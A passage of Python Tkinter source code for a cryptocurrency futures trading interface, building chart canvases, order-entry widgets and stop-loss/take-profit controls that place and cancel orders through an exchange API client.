self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#__PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Pair", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Param",anchor=CENTER)
self.Tree_PI.heading("val",text="Value",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='symbol')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='status')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='baseAsset')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='quoteAsset')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='marginAsset')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='contractType')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='minPrice')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='maxPrice')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='tickSize')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='maxQty')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='stepSize')
#_____________Orders START
#__Label - Заднее поле для работы с ордерами
self.label_CmdOrd = Label(self.label_Cmd, text="New position", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
#__Label - Количество (Amaunt)
self.label_QOrd = Label(self.label_CmdOrd, text="Qty", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
#__TextBox - Количество (Amaunt)
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
#__Label - Количество (Amaunt)
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
#__Label - Цена
self.label_POrd = Label(self.label_CmdOrd, text="Price", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
#__TextBox - Цена
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
#__Label - Цена
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
#__new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="New Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
#__new order LONG button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="New Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
#__temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="Show", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
#__close opened orders
self.button_NwODel = Button(self.label_CmdOrd, text="Delete",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
self.Tree_Ord=ttk.Treeview(self.label_CmdOrd,selectmode='browse')
self.Tree_Ord['columns']=('Pos','Side','Price','Qty','Type')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Pos",anchor=W,width=20)
self.Tree_Ord.column("Side",anchor=W,width=20)
self.Tree_Ord.column("Price",anchor=W,width=20)
self.Tree_Ord.column("Qty",anchor=W,width=20)
self.Tree_Ord.column("Type",anchor=W,width=20)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Pos",text="Pos",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Side",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Price",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Ord.heading("Type",text="Type",anchor=CENTER)
self.Tree_Ord.place(height=220,width=180,x=0,y=190)
self.Tree_Ord_VScrl = Scrollbar(self.label_CmdOrd,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=220,width=10,x=180,y=190)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Set",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Set",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=510,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
MPSLvar=StringVar()
MPSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
MPSLvar.set(MPSL_list[2])
self.GRSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
#__TICK/CANDLE/... start/stop button - start/stop timer
self.button_1 = Button(root, text="Start", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#__Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#__First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#__Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#__TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#__TEST PAINTING END
#__Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#__First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#__First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#__Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#__Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#__BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#__Zoom button
self.button_Ord = Button(root, text="Start Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#__Start/stop button
self.button_OrdTmr = Button(root, text="Orders start", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#__Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
self.Tree_Pos.bind("<Button-1>",self.Tree_Pos_click)
#_______________MIDDLE SIDE END
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
#__Event left mouse click on the widget Tree_Pos
def Tree_Pos_click(self,event):
#print(should_run_T,should_run_C,should_run_S)
if should_run_T == False and should_run_C == False and should_run_S == False:
Tr_item_0 = app.Tree_Pos.identify('item',event.x,event.y)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
if int(TP_CC) > 0:
#print(len(Tr_item_0))
if len(Tr_item_0) > 0:
if int(Tr_item_0[0]) <= int(TP_CC) and int(Tr_item_0[0]) > 0:
#print(Tr_item_0[0])
#print(app.Tree_Pos.item(Tr_item_0[0])['values'])
Tr_item_1 = app.Tree_Pos.item(Tr_item_0[0])['values']
Tr_item_2 = str(Tr_item_1[1])
#print('.',Tr_item_2,'.')
if MS == 'SPOT':
for ij in range(len(mylist10)):
if mylist10[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
if MS == 'FUTURES':
for ij in range(len(mylist20)):
if mylist20[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
#app.CB_P.set(Tr_item_2) - doesn't work
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Stop-Loss posted [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Take-Profit posted [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Take-Profit posted [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Stop-Loss posted [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#__Событие прокрутка колеса мыши на виджете Scale_TP
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-450,from_=-100)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-800,from_=-450)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=-100,from_=350)
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=700,from_=1050)
elif app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-100,from_=350)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-450,from_=-100)
app.Scale_TP.set(app.Scale_TP.get()+0.1)
#__Событие прокрутка колеса мыши на виджете Scale_SL
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-450,from_=-100)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-800,from_=-450)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=-100,from_=350)
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=700,from_=1050)
elif app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-100,from_=350)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-450,from_=-100)
app.Scale_SL.set(app.Scale_SL.get()+0.1)
#__Событие изменения значения виджета Scale_TP
def Scale_TP_change(self,value):
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Price: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Price: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#__Событие изменения значения виджета Scale_SL
def Scale_SL_change(self,value):
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Price: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Price: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
